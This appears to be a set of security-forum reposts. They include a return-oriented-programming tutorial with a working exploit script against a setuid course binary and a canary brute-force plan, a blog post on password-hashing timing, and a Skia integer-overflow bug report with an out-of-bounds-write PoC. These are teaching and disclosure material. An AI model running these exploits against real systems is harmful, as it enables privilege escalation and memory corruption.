ropchain

I'm going to show you how to do Project 1 Question 1 while ASLR+DEP+stack canaries are enabled. As a reminder, here's how the code looks:

void deja_vu() {
    char door[8];
    gets(door);
}

int main() {
    deja_vu();
}

A Chinese translation of this article is available here.

ASLR and DEP

We will start by defeating ASLR and DEP. The text segment of our dejavu binary will not be randomized, since it is not a position-independent executable. This means we can get around both defenses with a return-oriented programming chain. Our solution is broken up into several steps:

1. Put the address of the system function from libc onto the stack.
2. Put the address of the string "s/kernel/rtsig-max" onto the stack (but possibly far from system).
3. Align the stack pointer to point to "s/kernel/rtsig-max".
4. Align edx to point to &system.
5. Call [edx].

This is equivalent to system("s/kernel/rtsig-max"), which executes an attacker-controlled binary with setuid privileges. The string "s/kernel/rtsig-max" is mostly arbitrary: any string contained in libc which can be treated as a relative Linux path, and whose address ends in a NUL byte, is a valid target. It's possible to get the string "/bin/sh" on the stack instead, but that makes our attack more complicated.

Return Oriented Programming Primer

The idea behind return-oriented programming is that you place the addresses of "gadgets" onto the stack. These gadgets do some (usually small) operation, and then execute ret. Each ret pops the address of the next gadget off the stack and jumps to that address. Our goal is to chain these small gadgets together in order to achieve arbitrary code execution. Effectively, we can think of ROP as letting us jump to any series of addresses we want, as long as the calls don't mess up our stack. The usual suspects for messing up the stack are a leave, or anything which changes esp by a lot. There are tools to help find gadgets within executables.
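As a toy illustration of what such tools do, here is a naive scanner — a sketch, not how ROPgadget actually works — that treats every 0xc3 ("ret") byte in a code blob as the end of a candidate gadget:

```python
# Naive gadget-scanner sketch: every 0xc3 (x86 "ret") byte ends a
# candidate gadget, and the few bytes before it form the gadget body.
# Real tools (ROPgadget, ropper) additionally disassemble these bytes
# to throw away nonsense sequences.

def find_candidate_gadgets(code, base_addr, max_len=4):
    gadgets = []
    for i, byte in enumerate(code):
        if byte == 0xc3:  # "ret"
            start = max(0, i - max_len)
            # Every suffix ending at the ret is a candidate gadget.
            for s in range(start, i + 1):
                gadgets.append((base_addr + s, bytes(code[s:i + 1])))
    return gadgets

# 0x49 is "dec ecx" in 32-bit mode, so this blob contains the
# "dec ecx ; ret" gadget used later in the article.
blob = bytes([0x90, 0x49, 0xc3, 0x90])
for addr, g in find_candidate_gadgets(blob, 0x08048000):
    print(hex(addr), g.hex())
```

Because candidates start at every byte offset, this also shows why gadgets can hide inside other instructions: the scanner does not care where the compiler's instruction boundaries were.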
This is useful, because sometimes gadgets can even be hidden inside other instructions! Let's run ROPgadget to see what sort of gadgets we have.

$ python ROPgadget.py --binary ../dejavu --badbytes 0a
# ...
Unique gadgets found: 86

We set a "bad byte" of 0x0a since we know that our gets function cannot write a newline. (It can write NUL bytes.) While we have a bunch of gadgets, most of them suck. Here are the few that we plan to use:

0x0804841c : dec ecx ; ret
0x0804835e : add dh, bl ; ret
0x0804857b : call dword ptr [edx]
0x080482d2 : pop ebx ; ret
0x080482bb : ret

Note that the last of these gadgets is effectively a return-oriented programming NOP: it just moves esp up 4 bytes to access the next return address. We'll see later why it is useful.

The Attack

We will need to reference the disassembly quite often. Here is the disassembly of the dejavu program, excluding libc parts.

deja_vu:
   0x0804840c <+0>:  push ebp
   0x0804840d <+1>:  mov ebp,esp
   0x0804840f <+3>:  sub esp,0x28
   0x08048412 <+6>:  lea eax,[ebp-0x10]
   0x08048415 <+9>:  mov DWORD PTR [esp],eax
   0x08048418 <+12>: call 0x80482f0 <gets@plt>
   0x0804841d <+17>: leave
   0x0804841e <+18>: ret

main:
   0x0804841f <+0>:  push ebp
   0x08048420 <+1>:  mov ebp,esp
   0x08048422 <+3>:  and esp,0xfffffff0
   0x08048425 <+6>:  call 0x804840c <deja_vu>
   0x0804842a <+11>: mov eax,0x0
   0x0804842f <+16>: leave
   0x08048430 <+17>: ret

Let's take a look at the stack layout at deja_vu+18 (right before we ret from the function). It looks something like this:

/---------------------\
|        . . .        |
| saved return addr.  | <--- esp
|        . . .        |
|        door         | <--- eax, edx
|        . . .        |
|      libc_end       | <--- ecx
|        . . .        |
|       system        | <--- we want this
|        . . .        |
|     libc_start      | <--- ebx
|        . . .        |
|    dejavu .text     |
\---------------------/

Even though libc's position is randomized, ebx and ecx effectively "leak" information about its location. This is a result of the dynamic loader resolving the call to gets@plt.
How this occurs is a little complicated, so let's take it for granted. While the address of libc is randomized by ASLR, the offset of things within libc is not. For example, the system function is always 0x168494 bytes before libc_end. We want to call this function, so we need to decrease ecx by 0x168494.

How can we decrease ecx? We do have a promising gadget which decrements ecx by 1:

0x0804841c : dec ecx ; ret

We would need to call this gadget 0x168494 times to get the address of system. (There are no other useful gadgets for either ecx or ebx.) Our available stack space is an order of magnitude less. However, we can use the following trick: we return to main. Because gcc aligns the stack at 16-byte intervals, we gain stack space every time we call main. The picture below illustrates the scenario right before main+3 executes:

/---------------------\
|        . . .        |
|       4 bytes       | <--- old esp
|         sfp         | <--- esp, ebp
|       4 bytes       |
|       4 bytes       |
|       4 bytes       | <--- esp & 0xfffffff0
|        . . .        |
\---------------------/

After we call main, our program continues to call deja_vu. This gives us another opportunity to do a buffer overflow and gain more stack space. By repeating this method a bunch of times, we can get enough stack space to do 0x168494 decrements. We need to perform all the decrements at once, since our value for ecx gets overwritten every time gets is called. We use the same method to get the address of "s/kernel/rtsig-max" onto the stack.

Once we have ecx pointing to system, we need to call that address. There is a call gadget, call dword ptr [edx]. So we need some way to get the address of the value of ecx into edx. The only place where we have the opportunity to put ecx on the stack is a push ecx in _start. The _start function is called by the operating system before main; it effectively loads libc, which then begins the main program.
_start:
   0x08048320 <+0>:  xor ebp,ebp
   0x08048322 <+2>:  pop esi
   0x08048323 <+3>:  mov ecx,esp
   0x08048325 <+5>:  and esp,0xfffffff0
   0x08048328 <+8>:  push eax
   0x08048329 <+9>:  push esp
   0x0804832a <+10>: push edx
   0x0804832b <+11>: push 0x80484b0
   0x08048330 <+16>: push 0x8048440
   0x08048335 <+21>: push ecx
   0x08048336 <+22>: push esi
   0x08048337 <+23>: push 0x804841f
   0x0804833c <+28>: call 0x8048310 <__libc_start_main@plt>
   0x08048341 <+33>: hlt

In order to have the program run correctly and push ecx onto the stack, we need to jump to _start+9. We could actually jump anywhere between _start+5 and _start+11, but that would mess up our stack alignment later on.

Recall that the return value of gets is stored in edx. We can use some arithmetic to get edx pointing where we need it. We do have a gadget which involves arithmetic using edx and ebx:

0x0804835e : add dh, bl ; ret

If you need a reminder of how x86 registers work, look at the following diagram.

/------------------------\
|          edx           |
|            |    dx     |
|            | dh  | dl  |
\------------------------/

The register edx refers to the whole 32-bit register. The register dx refers to the lower 16 bits of the register. dh and dl refer to the two 8-bit halves of those lower 16 bits. So this gadget lets us change the middle bits of edx however we want. Note that we can't "overflow" dh into the top half of the register, so we cannot actually affect the top bits of edx.

There is also a gadget letting us pop into ebx, so we completely control bl: we can load any value we want into ebx by putting it on the stack and letting it get popped into the register. However, this only lets us affect the second least significant byte of edx. Since edx holds the address of the door buffer, we can also change edx by moving where the stack (and thus door) sits. Therefore we can use the same stack trick of returning to main in order to align edx with the address of system.
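To see concretely why add dh, bl only touches bits 8-15 of edx, here's a quick simulation of x86 partial-register semantics (an illustrative sketch, not tied to the exploit's concrete values):

```python
def add_dh_bl(edx, ebx):
    """Simulate the x86 gadget "add dh, bl": add the low byte of ebx
    into bits 8-15 of edx; any overflow wraps inside dh (no carry
    into the upper 16 bits)."""
    dh = (edx >> 8) & 0xff
    bl = ebx & 0xff
    new_dh = (dh + bl) & 0xff          # overflow stays inside dh
    return (edx & 0xffff00ff) | (new_dh << 8)

edx = 0xdeadbeef
# Adding 0x01 to dh changes only byte 1; the top 16 bits are untouched.
print(hex(add_dh_bl(edx, 0x01)))          # 0xdeadbfef
# dh wraps around instead of carrying into bits 16-31.
print(hex(add_dh_bl(0x0000ff00, 0x01)))   # 0x0
```

This is exactly why the gadget can only fix up the second-least-significant byte of edx, and why the remaining alignment has to come from moving the stack itself.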
Now we need to align our stack pointer with our executable string so that we can use it as an argument to system. We simply use a ROP NOP (similar to a ret2ret chain):

0x080482bb : ret

After a few NOPs, our stack pointer is nearly at the right spot. We finish our ROP chain with the previously mentioned call dword ptr [edx]. gets also terminates our input with a NUL byte, which overwrites the LSB of the executable string's address. (This is why we chose a string whose address already ended in 0x00.) Now we are in a ret2libc scenario: we are calling system with a pointer to a string on the stack. This runs the program as uid brown, which allows us to do whatever we want.

Stack Canaries

Let's say that we also add stack canaries. How much more difficult does this make our exploit? Debian systems always set the least significant byte of the canary to 0x00, so we only have 24 bits of entropy. We stick with a constant guess of 0x41414100 as the stack canary, and simply keep running until we hit it. An efficient C program using syscalls can get on the order of 2,500 tries per second. Based on this, we can estimate that our program will take approximately 1.2 hours to crack the canary.

Closing Thoughts

The final ropchain is listed in ropchain.py below. The code can be modified to create the necessary directories and executable automatically, and to work when stack canaries are enabled.
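The canary timing estimate can be sanity-checked with a little arithmetic (a back-of-the-envelope sketch assuming the 2,500 tries per second quoted above):

```python
import math

entropy_bits = 24          # LSB of the canary is fixed to 0x00 on Debian
tries_per_second = 2500    # observed rate of the brute-forcing C program

# Guessing one fixed value against a uniform 24-bit canary succeeds after
# a geometrically distributed number of tries; the *median* number of
# attempts is about ln(2) * 2^24.
median_tries = math.log(2) * 2 ** entropy_bits
hours = median_tries / tries_per_second / 3600
print("median time to hit the canary: %.1f hours" % hours)  # ~1.3 hours
```

That lands in the same ballpark as the article's ~1.2-hour figure; the mean (2^24 tries) would be closer to 1.9 hours, so the quoted number is evidently a median-style estimate.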
#!/usr/bin/env python2
# ropchain.py
from struct import pack

p = lambda n: pack("<I", n)

sc = []
PAD = 'A' * 20

DEC_ECX = p(0x0804841c)
RET_MAIN = p(0x0804841f)
RET_START = p(0x08048320 + 9)
POP_EBX = p(0x080482d2)
ADD_DH_BL = p(0x0804835e)
CALL_STAR_EDX = p(0x0804857b)
ROP_NOP = p(0x080482bb)
NEWLINE = '\n'

GET_16B = PAD + RET_MAIN + NEWLINE

OFFSET_BINARY = 0x450c4
OFFSET_SYSTEM = 0x168494

def load_libc_address(offset):
    sc.extend([GET_16B] * ((offset + 3) / 4))
    sc.append(PAD)
    sc.extend([DEC_ECX] * offset)
    sc.append(RET_START)
    sc.append(NEWLINE)

load_libc_address(OFFSET_SYSTEM)
load_libc_address(OFFSET_BINARY)

sc.extend([GET_16B] * 3)
sc.append(PAD + POP_EBX + p(1))
sc.append(ADD_DH_BL)
sc.extend([ROP_NOP] * 15)
sc.append(CALL_STAR_EDX)
sc.append(NEWLINE)

print(''.join(sc))

Sursa: http://www.kvakil.me/posts/ropchain/
-
Do Not Use sha256crypt / sha512crypt - They're Dangerous

Introduction

I'd like to demonstrate why I think using sha256crypt or sha512crypt on current GNU/Linux operating systems is dangerous, and why I think the developers of GLIBC should move to scrypt or Argon2, or at least bcrypt or PBKDF2.

History and md5crypt

In 1994, Poul-Henning Kamp (PHK) added md5crypt to FreeBSD to address the weaknesses of DES-crypt that was common on the Unix and BSD systems of the early 1990s. DES-crypt has a core flaw: not only is DES reversible (which isn't necessarily a problem here) and incredibly fast, but it also limited password length to 8 characters (each of those limited to 7-bit ASCII to create a 56-bit DES key). When PHK created md5crypt, one of the things he made sure to implement as a feature was support for arbitrary-length passwords. In other words, unlike DES-crypt, a user could have a password of 9 or more characters. This was "good enough" for 1994, but it had an interesting property that I don't think PHK thought of at the time: md5crypt execution time is dependent on password length.

To prove this, I wrote a simple Python script using passlib to hash passwords with md5crypt. I started with a single "a" character as my password, then increased the password length by appending more "a"s, up until the password was 4,096 "a"s total.

import time
from passlib.hash import md5_crypt

md5_results = [None] * 4096

for i in xrange(0, 4096):
    print i,
    pw = "a" * (i+1)
    start = time.clock()
    md5_crypt.hash(pw)
    end = time.clock()
    md5_results[i] = end - start

with open("md5crypt.txt", "w") as f:
    for i in xrange(0, 4096):
        f.write("{0} {1}\n".format(i+1, md5_results[i]))

Nothing fancy. Start the timer, hash one "a" with md5crypt, stop the timer, and record the result. Start the timer, hash two "a"s with md5crypt, stop the timer, and record the result. Wash, rinse, repeat, until the password is 4,096 "a"s in length.
What do the timing results look like?

[Scatter plots: md5crypt timing for passwords of 1-128, 1-512, and 1-4,096 characters]

At first, you wouldn't think this is a big deal; in fact, you may even think you LIKE it (we're supposed to make things get slower, right? That's a good thing, right???). But, upon deeper inspection, this actually is a flaw in the algorithm's design, for two reasons:

- Long passwords can create a denial-of-service on the CPU (larger concern).
- Passive observation of execution times can predict password length (smaller concern).

Now, to be fair, predicting password length based on execution time is ... meh. Let's be honest, the bulk of passwords will be between 7-10 characters. And because these algorithms operate on block sizes of 16, 32, or 64 bytes, an adversary learning "AHA! I know your password is between 1-16 characters" really isn't saying much. But should this even exist in a cryptographic primitive? Probably not.

Still, the larger concern is users creating a DoS on the CPU, strictly by changing password length. I know what you're thinking: it's 2018, so there should be no reason why any practical-length password cannot be hashed with md5crypt insanely quickly, and you're right. Except, md5crypt was invented in 1994, 24 years ago. According to PHK, he designed it to take about 36 milliseconds on the hardware he was testing, which works out to about 28 hashes per second. So it doesn't take much to see that by increasing the password's length, you can increase execution time enough to affect a busy authentication server.

The question, though, is why? Why is the execution time dependent on password length? This is because md5crypt processes the hash for every 16 bytes in the password. As a result, this creates the stepping behavior you see in the scatter plots above. A good password hashing design would not do this.
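A toy cost model makes the stepping behavior plain: if per-iteration work grows with the number of 16-byte blocks the password occupies, cost is flat within a block and jumps at each boundary (an illustrative model, not the real md5crypt algorithm):

```python
import math

def md5crypt_cost_model(pw_len, iterations=1000):
    """Toy model: per-iteration work is proportional to the number of
    16-byte MD5 blocks covered by the password. md5crypt hard-codes
    1,000 iterations."""
    blocks = math.ceil(pw_len / 16)
    return iterations * blocks

# Cost is flat inside a 16-byte block...
assert md5crypt_cost_model(7) == md5crypt_cost_model(10)
# ...and steps up when the password crosses a block boundary, which is
# exactly the staircase seen in the scatter plots.
print(md5crypt_cost_model(16), md5crypt_cost_model(17))  # 1000 2000
```

A design where cost depended only on the iteration count would make this function a flat line in pw_len, which is what the PBKDF2 plots later in the article show.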
PHK eventually sunset md5crypt in 2012 with CVE-2012-3287. Jeremi Gosney, a professional password cracker, demonstrated with Hashcat and 8 clustered Nvidia GTX 1080Ti GPUs that a password cracker could rip through 128.4 million md5crypt guesses per second. You should no longer be implementing md5crypt for your password hashing.

sha2crypt and NIH syndrome

In 2007, Ulrich Drepper decided to improve things for GNU/Linux. He recognized the threat that GPU clusters, and even ASICs, posed for fast password cracking against md5crypt. One weakness of md5crypt was the hard-coded 1,000 iterations spent on the CPU before the password hash was finalized; this cost was not configurable. Also, MD5 was already considered broken, with SHA-1 showing severe weaknesses, so he moved to SHA-2 for the core of his design. The first thing addressed was to make the cost configurable, so that as hardware improved, you could increase the iteration count, thus keeping the final hash expensive for password crackers. However, he also made a couple of core changes to his design that differed from md5crypt, which ended up having some rather drastic effects on its execution.

Using code similar to the above with Python's passlib, but with the sha256_crypt() and sha512_crypt() functions instead, we can create scatter plots of sha256crypt and sha512crypt for passwords up to 128, 512, and 4,096 characters total, just like we did with md5crypt. How do they fall out? Take a look:

[Scatter plots: sha256crypt and sha512crypt timing for passwords of 1-128, 1-512, and 1-4,096 characters]

Curious. Not only do we see the same increasing execution time based on password length, but unlike md5crypt, that growth is polynomial. The changes Ulrich Drepper made from md5crypt are subtle, but critical.
Essentially, not only do we process the hash for every character in the password per round, like md5crypt, but we process every character in the password three more times. First, we take the binary representation of each bit in the password, and update the hash based on whether we see a "1" or a "0". Second, for every character in the password, we update the hash. Finally, again, for every character in the password, we update the hash. For those familiar with big-O notation, we end up with a running time of O(pw_length^2 + pw_length * iterations).

Now, while it is true that we want our password hashing functions to be slow, we also want the iterative cost to be the driving factor, but that isn't the case with md5crypt, and it's not the case with sha256crypt or sha512crypt. In all three cases, the password length is the driving factor in the execution time, not the iteration count. Again, why is this a problem? To remind you:

- Long passwords can create a denial-of-service on the CPU (larger concern).
- Passive observation of execution times can predict password length (smaller concern).

Now, granted, in practice, people aren't carrying around 4-kilobyte passwords. If you are a web service provider, you probably don't want people uploading 5-gigabyte "passwords" to your service, creating a network denial of service. So you would probably be interested in setting an adequate password maximum, such as the 128 characters NIST recommends, to prevent that from occurring. However, if you have an adequate iterative cost (say, 640,000 rounds), then even moderately large passwords from staff, where such limits may not be imposed, could create a CPU denial of service on busy authentication servers. As with md5crypt, we don't want this.

Now, here's what I find odd about Ulrich Drepper and his design. In his post, he says about his specification (emphasis mine): Well, there is a problem.
I can already hear everybody complaining that I suffer from the NIH syndrome but this is not the reason. The same people who object to MD5 make their decisions on what to use also based on NIST guidelines. And Blowfish is not on the lists of the NIST. Therefore bcrypt() does not solve the problem. What is on the list is AES and the various SHA hash functions. Both are viable options. The AES variant can be based upon bcrypt(), the SHA variant could be based on the MD5 variant currently implemented. Since I had to solve the problem and I consider both solutions equally secure I went with the one which involves less code. The solution we use is based on SHA. More precisely, on SHA-256 and SHA-512.

PBKDF2 was standardized as an IETF standard in September 2000, a full 7 years before Ulrich Drepper created his password hashing functions. While PBKDF2 as a whole would not be blessed by NIST until 3 years later, in December 2010 in SP 800-132, PBKDF2 can be based on functions that, as he mentioned, were already in the NIST standards. So, just like his special design based on SHA-2, PBKDF2 can be based on SHA-2. Where he said "I went with the one which involves less code", he should have gone with PBKDF2, as code had already long since existed in all sorts of cryptographic software, including OpenSSL. This seems to be a very clear case of NIH syndrome. Sure, I understand not wanting to go with bcrypt, as it's not part of the NIST standards. But don't roll your own crypto either, when algorithms already exist for this very purpose that ARE based on designs that are part of NIST.

So, how does PBKDF2-HMAC-SHA512 perform?
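It's worth noting that PBKDF2-HMAC-SHA512 needs no third-party code at all today — Python ships it in hashlib (a minimal sketch; the article's measurements use passlib instead, and the parameters here are purely illustrative):

```python
import hashlib
import os

password = b"correct horse battery staple"
salt = os.urandom(16)      # per-user random salt
iterations = 50_000        # in the range Mac OS X reportedly uses

# PBKDF2's per-iteration work is a fixed number of HMAC block
# operations, so execution time is driven by the iteration count,
# not by password length.
key = hashlib.pbkdf2_hmac("sha512", password, salt, iterations, dklen=64)
print(key.hex())
```

Raising the iteration count is the knob you turn as hardware improves; the password's length barely registers in the cost.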
Using similar Python code with the passlib password hashing library, it was trivial to put together:

[Scatter plots: PBKDF2-HMAC-SHA512 timing for passwords of 1-128, 1-512, and 1-4,096 characters]

What this clearly demonstrates is that the only factor driving execution time is the number of iterations you apply to the password before delivering the final password hash. This is what you want to achieve: neither giving a user the opportunity to create a denial-of-service based on password length, nor letting an adversary learn the length of the user's password based on execution time. These are the sorts of details that a cryptographer or cryptography expert would pay attention to, as opposed to an end-developer. It's worth pointing out that PBKDF2-HMAC-SHA512 is the default password hashing function for Mac OS X, with a variable cost between 30,000 and 50,000 iterations (the typical PBKDF2 default is 1,000).

OpenBSD, USENIX, and bcrypt

Because Ulrich Drepper brought up bcrypt, it's worth mentioning in this post. First off, let's get something straight: bcrypt IS NOT Blowfish. While it's true that bcrypt is based on Blowfish, they are two completely different cryptographic primitives. bcrypt is a one-way cryptographic password hashing function, whereas Blowfish is a two-way 64-bit block symmetric cipher.

At the 1999 USENIX conference, Niels Provos and David Mazières, of OpenBSD, introduced bcrypt to the world. They were critical of md5crypt, stating the following (emphasis mine):

MD5 crypt hashes the password and salt in a number of different combinations to slow down the evaluation speed. Some steps in the algorithm make it doubtful that the scheme was designed from a cryptographic point of view--for instance, the binary representation of the password length at some point determines which data is hashed, for every zero bit the first byte of the password and for every set bit the first byte of a previous hash computation.
PHK was slightly offended by their off-handed remark that cryptography was not his core consideration when designing md5crypt. However, Niels Provos was a graduate student in the Computer Science PhD program at the University of Michigan at the time; by August 2003, he had earned his PhD. Since 1999, bcrypt has withstood the test of time: it has been considered "best practice" for hashing passwords, and is still well received today, even though better algorithms now exist for hashing passwords.

How does bcrypt compare to md5crypt, sha256crypt, and sha512crypt in execution time based on password length?

[Scatter plots: bcrypt timing for passwords of 1-128, 1-512, and 1-4,096 characters]

Again, we see consistent execution, driven entirely by iteration cost, not by password length.

Colin Percival, Tarsnap, and scrypt

In May 2009, mathematician Dr. Colin Percival presented to BSDCan'09 a new adaptive password hashing function called scrypt, which is not only CPU expensive, but RAM expensive as well. The motivation was that even though bcrypt and PBKDF2 are CPU-intensive, FPGAs or ASICs could be built to work through the password hashes much more quickly, since these functions require very little RAM, around 4 KB. By adding a memory cost, in addition to a CPU cost, we can now require FPGA and ASIC designers to onboard a specific amount of RAM, thus financially increasing the cost of production. scrypt recommends a default RAM cost of at least 16 MB. I like to think of these expensive functions as "security by obesity".

scrypt was initially created as an expensive KDF for Percival's backup service Tarsnap. Tarsnap generates client-side encryption keys and encrypts your data on the client, before shipping the encrypted payload off to Tarsnap's servers.
If your client is ever lost or stolen, regenerating the encryption keys requires knowing the password that created them, and attempting to discover that password, just as with typical password hashing functions, should be slow. It has now been 9 years, as of this post, since Dr. Percival introduced scrypt to the world, and like bcrypt, it has withstood the test of time. It has received, and continues to receive, extensive cryptanalysis, is not showing any critical flaws or weaknesses, and as such is among the top recommendations from security professionals for password hashing and key derivation.

How does it fare with its execution time per password length?

[Scatter plots: scrypt timing for passwords of 1-128, 1-512, and 1-4,096 characters]

I'm seeing a trend here.

The Password Hashing Competition winner Argon2

In 2013, an open public competition, in the spirit of AES and SHA-3, was held to create a password hashing function that approached password security from what we know of modern cryptography and password security. There were many interesting designs submitted, including a favorite of mine by Dr. Thomas Pornin of StackExchange fame and BearSSL, which used delegation to reduce the workload on the honest party while still making it expensive for the password cracker.

In July 2015, the Argon2 algorithm was chosen as the winner of the competition. It comes with a clean approach to CPU and memory hardness, making the parameters easy to tweak, test, and benchmark. Even though the algorithm is relatively new, it has seen at least 5 years of analysis as of this writing, and has quickly become the "gold standard" for password hashing. I fully recommend it for production use. Any bets on how its execution time will be affected by password length? Let's look:

[Scatter plots: Argon2 timing for passwords of 1-128, 1-512, and 1-4,096 characters]

Execution time is not affected by password length. Imagine that.
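The memory-hardness parameters discussed for scrypt can be exercised directly from Python's standard library (hashlib.scrypt, available with OpenSSL 1.1+; parameters here are illustrative, not a production recommendation):

```python
import hashlib
import os

salt = os.urandom(16)

# n (CPU/memory cost), r (block size), p (parallelism): memory use is
# roughly 128 * r * n bytes, so n=16384, r=8 needs about 16 MB of RAM,
# matching the minimum RAM cost the article mentions for scrypt.
key = hashlib.scrypt(b"hunter2", salt=salt, n=16384, r=8, p=1,
                     maxmem=64 * 2**20, dklen=32)
print(key.hex())
print("approx. memory cost: %d MB" % (128 * 8 * 16384 // 2**20))  # 16 MB
```

An ASIC attacking these parameters must provision ~16 MB per parallel guess, which is exactly the "security by obesity" cost that plain bcrypt and PBKDF2 lack.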
It's as if cryptographers know what they're doing when designing this stuff.

Conclusion

Ulrich Drepper tried creating something more secure than md5crypt, and ended up creating something worse. Don't use sha256crypt or sha512crypt; they're dangerous.

For hashing passwords, in order of preference, use with an appropriate cost:

1. Argon2 or scrypt (CPU and RAM hard)
2. bcrypt or PBKDF2 (CPU hard only)

Avoid practically everything else:

- md5crypt, sha256crypt, and sha512crypt
- Any generic cryptographic hashing function (MD5, SHA-1, SHA-2, SHA-3, BLAKE2, etc.)
- Any complex homebrew iterative design (10,000 iterations of salted SHA-256, etc.)
- Any encryption design (AES, Blowfish (ugh), ChaCha20, etc.)

Acknowledgement

Thanks to Steve Thomas (@Sc00bzT) for our discussions on Twitter, helping me see this quirky behavior with sha256crypt and sha512crypt.

Posted by Aaron Toponce on Wednesday, May 23, 2018, at 6:56 am.

Sursa: https://pthree.org/2018/05/23/do-not-use-sha256crypt-sha512crypt-theyre-dangerous/
-
Table of Contents

- Serialization (marshaling)
- Deserialization (unmarshaling)
- Programming language support for serialization
- Risk of using serialization
- Serialization in Java
- Deserialization vulnerability in Java
- Code flow work
- Vulnerability Detection
- CVE
- Tools
- Vulnerable libraries lead to RCE
- Mitigation
- Serialization in Python
- Deserialization vulnerability in Python
- Pickle instructions
- Exploit vulnerability
- CVE
- Mitigation
- Serialization in PHP
- Deserialization vulnerability in PHP
- Exploit vulnerability
- CVE
- Mitigation
- Serialization in Ruby
- Deserialization vulnerability in Ruby
- Detect and exploit vulnerability
- CVE
- Tools
- Mitigation
- Conclusion

Download: https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf?rss
-
Mobile Security Updates: Understanding the Issues
A Commission Report, February 2018
FEDERAL TRADE COMMISSION
Maureen K. Ohlhausen, Acting Chairman
Terrell McSweeny, Commissioner

Download: https://www.ftc.gov/system/files/documents/reports/mobile-security-updates-understanding-issues/mobile_security_updates_understanding_the_issues_publication_final.pdf
-
Skia and Firefox: Integer overflow in SkTDArray leading to out-of-bounds write

Reported by ifratric@google.com, Feb 28

Issue description

Skia bug report: https://bugs.chromium.org/p/skia/issues/detail?id=7674
Mozilla bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=1441941

In Skia, SkTDArray stores length (fCount) and capacity (fReserve) as 32-bit ints and does not perform any integer overflow checks. There are a couple of places where an integer overflow could occur:

(1) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=369
(2) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=382
(3) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=383

and possibly others. In addition, on 32-bit systems, multiplication integer overflows could occur in several places where expressions such as fReserve * sizeof(T) or sizeof(T) * count are used.

An integer overflow in (2) above is especially dangerous, as it will cause too little memory to be allocated to hold the array, which will cause an out-of-bounds write when e.g. appending an element. I have successfully demonstrated the issue by causing an overflow in the fPts array in SkPathMeasure (https://cs.chromium.org/chromium/src/third_party/skia/include/core/SkPathMeasure.h?l=104&rcl=23d97760248300b7aec213a36f8b0485857240b5), which is used when rendering dashed paths. The PoC requires a lot of memory (my estimate is 16+1 GB for storing the path, plus an additional 16 GB for the SkTDArray we are corrupting); however, there might be less demanding paths for triggering SkTDArray integer overflows.
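The arithmetic behind the bug can be simulated in a few lines (a model of 32-bit signed wraparound, assuming a growth computation of the shape `count + extra` with no overflow check; this is not the exact Skia code):

```python
def to_int32(n):
    """Wrap a Python integer to a 32-bit signed int, like a C `int`."""
    n &= 0xffffffff
    return n - 2**32 if n >= 2**31 else n

# SkTDArray keeps fCount/fReserve as 32-bit ints. If the needed capacity
# is computed as fCount + growth without a check, a sufficiently large
# array makes the sum wrap negative, so far too little memory is
# allocated and a later append writes out of bounds.
fCount = 2**31 - 4             # near INT_MAX, as in the 16+ GB PoC path
needed = to_int32(fCount + 8)  # wraps instead of growing
print(needed)                  # negative: any "needed <= fReserve" style
                               # comparison now passes bogusly
```

This is why the PoC below drives the point count toward 2^31: the wrapped capacity value defeats the reallocation logic.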
PoC program for Skia
=================================================================
#include <stdio.h>
#include "SkCanvas.h"
#include "SkPath.h"
#include "SkGradientShader.h"
#include "SkBitmap.h"
#include "SkDashPathEffect.h"

int main (int argc, char * const argv[]) {
    SkBitmap bitmap;
    bitmap.allocN32Pixels(500, 500);

    //Create Canvas
    SkCanvas canvas(bitmap);

    SkPaint p;
    p.setAntiAlias(false);
    float intervals[] = { 0, 10e9f };
    p.setStyle(SkPaint::kStroke_Style);
    p.setPathEffect(SkDashPathEffect::Make(intervals, SK_ARRAY_COUNT(intervals), 0));

    SkPath path;
    unsigned quadraticarr[] = {13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613, 0};
    path.moveTo(0, 0);
    unsigned numpoints = 1;
    unsigned i = 1;
    unsigned qaindex = 0;
    while(numpoints < 2147483647) {
        if(numpoints == quadraticarr[qaindex]) {
            path.quadTo(i, 0, i, 0);
            qaindex++;
            numpoints += 2;
        } else {
            path.lineTo(i, 0);
            numpoints += 1;
        }
        i++;
        if(i == 1000000) {
            path.moveTo(0, 0);
            numpoints += 1;
            i = 1;
        }
    }
    printf("done building path\n");
    canvas.drawPath(path, p);
    return 0;
}
=================================================================

ASan output:
ASAN:DEADLYSIGNAL
=================================================================
==39779==ERROR: AddressSanitizer: SEGV on unknown address 0x7fefc321c7d8 (pc 0x7ff2dac9cf66 bp 0x7ffcb5a46540 sp 0x7ffcb5a45cc8 T0)
    #0 0x7ff2dac9cf65 (/lib/x86_64-linux-gnu/libc.so.6+0x83f65)
    #1 0x7bb66c in __asan_memcpy (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x7bb66c)
    #2 0xcb2a33 in SkTDArray<SkPoint>::append(int, SkPoint const*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../include/private/../private/SkTDArray.h:184:17
    #3 0xcb8b9a in SkPathMeasure::buildSegments() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:341:21
    #4 0xcbb5f4 in SkPathMeasure::getLength() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:513:9
    #5 0xcbb5f4 in SkPathMeasure::nextContour() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:688
    #6 0x1805c14 in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/utils/SkDashPath.cpp:482:14
    #7 0xe9cf60 in SkDashImpl::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/effects/SkDashPathEffect.cpp:40:12
